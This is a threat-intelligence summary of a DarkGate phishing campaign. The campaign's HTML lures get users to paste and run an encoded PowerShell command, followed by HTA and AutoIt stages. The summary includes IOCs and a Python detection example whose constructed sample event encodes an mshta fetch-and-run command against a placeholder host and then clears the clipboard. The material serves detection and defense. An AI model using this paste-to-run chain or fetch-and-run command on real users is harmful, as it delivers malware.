Two sentences summarizing the content: ASEC researchers found phishing emails distributing HTML attachments that urge recipients to paste commands to run them, leading to a multi-stage infection that drops DarkGate via PowerShell, HTA, and AutoIt components. The campaign downloads payloads from C2, decodes commands from Base64, and uses clipboard manipulation to obscure execution. #DarkGate #PowerShell #HTA #AutoIt #ASEC #HTMLPhishing
Keypoints
- The threat actor distributes phishing HTML attachments via email to prompt users to open them and take action.
- The emails simulate legitimate topics (fee processing, operation instruction reviews) to coax recipients into opening attachments.
- Opening the HTML leads to a background message mimicking MS Word and prompts the user to click a button to view content offline.
- On consent, users go through a sequence: Win+R → CTRL+V → Enter, while the PowerShell command is Base64-encoded and saved to the clipboard.
- The PowerShell script downloads an HTA file from a C2 and executes it, while clearing the clipboard to obscure the command.
- HTA launches the PowerShell command from the C2, and AutoIt (inside a ZIP) runs a script (script.a3x) as part of the infection chain, culminating in DarkGate malware.
- Detected file types and IOCs include multiple HTA/HTML/PowerShell artifacts and a list of download URLs linked to the campaign.
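The Win+R paste chain above leaves a distinctive shape in endpoint telemetry: PowerShell spawned by explorer.exe with an encoded command that, once decoded, fetches an HTA and clears the clipboard. The following detection logic is an added example written for this summary, not code from ASEC or the campaign; the Sysmon-style events, the `placeholder.invalid` host and the field names are constructed for the example.

```python
import base64
import re

ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
HTA_RE = re.compile(r"mshta|\.hta\b", re.IGNORECASE)
CLIP_RE = re.compile(r"set-clipboard|\|\s*clip(?:\.exe)?\b", re.IGNORECASE)

def _enc(ps: str) -> str:
    # Encode the way -EncodedCommand expects: UTF-16LE, then Base64.
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")

# Constructed sample process-creation events (Sysmon Event ID 1 style fields), not real telemetry.
# Event 0 mirrors the Win+R paste chain with a placeholder host; events 1 and 2 are benign.
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS_IMAGE,
     "CommandLine": "powershell -w hidden -enc "
     + _enc("Start-Process mshta 'https://placeholder.invalid/dark.hta'; Set-Clipboard -Value ''")},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS_IMAGE,
     "CommandLine": r"powershell -File C:\scripts\deploy.ps1"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS_IMAGE,
     "CommandLine": "powershell -enc " + _enc("Get-Date")},
]

def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(event: dict) -> list:
    # Collect the observations that together characterise a paste-to-run launch.
    reasons = []
    if event["ParentImage"].lower().endswith("\\explorer.exe") and "powershell" in event["Image"].lower():
        reasons.append("powershell spawned by explorer.exe (Win+R style launch)")
    decoded = decode_encoded_command(event["CommandLine"])
    if decoded is not None:
        reasons.append("encoded command")
        if HTA_RE.search(decoded):
            reasons.append("HTA retrieval in decoded command")
        if CLIP_RE.search(decoded):
            reasons.append("clipboard clearing in decoded command")
    return reasons

def is_paste_to_run(event: dict) -> bool:
    # Flag only when launch shape, encoding and a chain-specific marker all coincide.
    reasons = score_event(event)
    return ("encoded command" in reasons and any("explorer.exe" in r for r in reasons)
            and any("decoded command" in r for r in reasons))
```

Requiring all three observations keeps routine encoded PowerShell from cmd.exe or build tools out of the alert queue while still catching the launch shape this chain relies on.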
MITRE Techniques
- [T1566.001] Phishing: Attachment – The attacker distributes phishing HTML attachments that prompt users to take action. "The threat actor sent emails about fee processing, operation instruction reviews, etc. to prompt recipients to open the attachments."
- [T1204] User Execution – The recipient is guided to click through prompts to view content and run commands. "The message tells the user to click the 'How to fix' button to view the Word document offline."
- [T1059.001] PowerShell – The malicious PowerShell command is executed as part of the infection flow. "The malicious PowerShell command (see Figure 4) ... is decoded and saved into the user's clipboard."
- [T1140] Deobfuscate/Decode Files or Information – The Base64-encoded PowerShell payload is decoded during execution. "Base64-encoded by the JavaScript (see Figure 3) is decoded and saved into the user's clipboard."
- [T1105] Ingress Tool Transfer – The payloads are downloaded from a C2 during the infection chain. "The PowerShell command downloads an HTA file from C2 and executes it."
- [T1218.005] HTA – The download and execution flow leverages an HTA to run the PowerShell command from the C2. "HTA executes the PowerShell command in C2."
- [T1059] Command and Scripting Interpreter – AutoIt script execution via the ZIP-delivered tool (script.a3x) represents scripting interpreter use. "Autoit3.exe inside the ZIP file uses the compiled malicious AutoIt script (script.a3x) as an argument to be executed."
Indicators of Compromise
- [File hash] 8b788345fe1a3e9070e2d2982c1f1eb2 – HTML file used in the initial delivery
- [File hash] 404bd47f17d482e139e64d0106b8888d – script.a3x detected in the payload chain
- [File hash] 30e2442555a4224bf15bbffae5e184ee – dark.hta involved in the dropper chain
- [File hash] 4d52ea9aa7cd3a0e820a9421d936073f – another HTML artifact in the campaign
- [Filename] script.a3x – invoked by the AutoIt component during execution
- [Filename] dark.hta – HTA component downloaded from C2
- [Filename] 1.hta – additional HTA artifact observed in the IOCs
- [URL] hxxps://jenniferwelsh[.]com/header.png – one of the download indicators
- [URL] hxxp://mylittlecabbage[.]net/qhsddxna – another download indicator
Read more: https://asec.ahnlab.com/en/66300/